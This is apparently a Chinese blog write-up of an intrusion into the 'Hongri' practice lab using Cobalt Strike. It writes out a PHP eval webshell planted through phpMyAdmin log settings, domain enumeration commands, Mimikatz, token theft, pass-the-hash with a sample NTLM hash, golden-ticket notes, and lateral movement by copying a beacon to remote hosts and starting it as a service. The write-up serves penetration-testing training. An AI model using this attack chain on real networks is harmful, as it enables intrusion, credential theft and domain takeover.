目录

CobaltStrike域内渗透
CobaltStrike域内渗透

access_time
brush 2923个字
local_library 192
local_offer 渗透测试

本次采用红日靶场作为例子

系统
ip
备注
server2008
192.168.52.138
域控
server2003
192.168.52.141
域成员
win7

192.168.52.143(内)

192.168.15.153(外)

web服务器


一打开发现是个php探针,根据经验,大概率存在phpmyadmin

图片.png

http://192.168.15.153/phpmyadmin/

果不其然,存在phpmyadmin

图片.png

secure_file_priv为NULL,意味着我们无法直接通过load_file()函数写shell,只能通过全局日志写shell

SHOW  VARIABLES  LIKE  '%secure%'

图片.png

先看一下全局日志的路径

SHOW GLOBAL VARIABLES LIKE '%general_%'

图片.png

打开日志

SET  GLOBAL general_log =  ON

图片.png

更改日志路径

SET  GLOBAL general_log_file =  'C:/phpStudy/WWW/hack.php'


图片.png

写入一句话木马

SELECT  "<?php @eval($_POST[‘cmdte’]) ?>"

蚁剑连接

图片.png

图片.png

打开CS生成木马,蚁剑上传运行

图片.png

图片.png

成功上线

图片.png

进行内网信息收集

常用命令

net view /domain 查找当前域
net view/domain:[domain] 查看当前域主机列表
net group "domain computers" /domain 
nltest /dclist:[domain] 查看域控
nslookup [name]  根据netblos查看ip地址
ping -n 1 -4 
nltest /domain_trusts 查看域的信任关系
nltest /server:[address] /domain_trusts

图片.png

图片.png

PowerView模块的使用

Invoke-Netview
Invoke-ShareFinder
Invoke-MapDomainTrusts

图片.png


列出域控
net dclist   
net dclist [domain]
列出目标共享列表
net share \\[name]
列出当前域控的主机
net view
net view [domain]

图片.png

图片.png

图片.png

运行Minkatz

图片.png

主要的过程就是发现域内信任主机 查看是否有默认共享 用域的普通用户 验证枚举域内主机的是否为本地管理员 通过winrm执行 mimikatz.ps1 

制作标记(token)

终止标记 rev2self (恢复原来的令[token]或标记)
需要管理员或者System权限
steal_token ID 域控的超级管理员进程id
make_token TEST1\Administrator qweQWE123.
make_token domain\user password
spawnas domain\user password
建立远程连接
net use \\host\c$ /user:domain\user password

图片.png

访问域控的C盘

图片.png

散列认证

pth .\administrator  ntlm
pth OWN\Administrator 8c535a2d84c3b21059d667639bb89db5

图片.png

图片.png

kerberos凭证认证
Kerberos和密码散列认证有些不一样,但是两者同样都是使用凭据来产生标记
Kerberos票证是存储存在一个叫kerberos托盘的地方
Kerberos原理是你们可以使用一个中间人 它叫 密匙分配发送服务器 并且 密匙分配发送服务器出凭据,你们可能现在使用那个凭据一次性与服务器相互作用他会告诉服务器,我很好 这是我凭据 验证凭据这个中间人如果信任它会给我服务器的凭据 这个凭据就可以让我们保持交互 并且没有任何帐号建立 如果你们获取了一个凭据 那就集成它,然后你们就可以使用这个指定凭据来与服务器进行交互了。一般情况下我使用凭据最好使用黄金凭据。
黄金凭据是域管理员自己生成的Kerberos凭据 来用mimikatz伪造一个黄金票证
有了黄金票据就有了访问域控权限krbtgt hash,通常用于后门。
你们需要四个不同的信息。
用户 、域名字、域id  krbtgt 的hash



查看当前票证

shell klist

图片.png


域的id获取

shell whoami/user

图片.png


进行内网横向获取权限

我们把域控拿下



由于域控在内网,是不出网的,所以我们要借助已经拿下的这台win7中转上线,新建转发监听器,监听地址填win7的内网地址,注意要关闭win7的防火墙

图片.png

生成木马,上传到当前被控主机

图片.png

图片.png

复制木马到目标主机

shell copy C:\Users\liukaifeng01\sh7.exe \\OWA\C$\windows\temp\sh7.exe

图片.png

添加服务

shell sc \\OWA create sh7 binpath= c:\windows\temp\sh7.exe

图片.png

启动服务

shell sc \\OWA start sh7

图片.png

域控上线

图片.png

我们用同样的方法把server2003的域成员也上线了

shell copy C:\Users\liukaifeng01\sh7.exe \\ROOT-TVI862UBEH\C$\windows\temp\sh8.exe

图片.png


shell sc \\ROOT-TVI862UBEH create sh8 binpath= c:\windows\temp\sh8.exe

图片.png


shell sc \\ROOT-TVI862UBEH start sh8

图片.png

域成员上线

图片.png

#如无特别声明,该文章均为 原创,转载请遵循 署名-非商业性使用 4.0 国际(CC BY-NC 4.0) 协议,即转载请注明文章来源。
#最后编辑时间为: 2023-01-22 12:49:38



create 添加新评论

请先登陆后再发表评论